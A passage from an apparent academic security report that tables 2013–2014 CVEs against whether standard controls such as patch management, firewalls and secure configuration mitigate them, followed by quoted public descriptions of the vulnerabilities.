CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls (include anti-DOS)
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration


CVE Details

CVE-2013-0008: "win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability"."

CVE-2013-0022: "Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability"."

CVE-2013-0084: "Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability"."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster Page 19 of 28

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

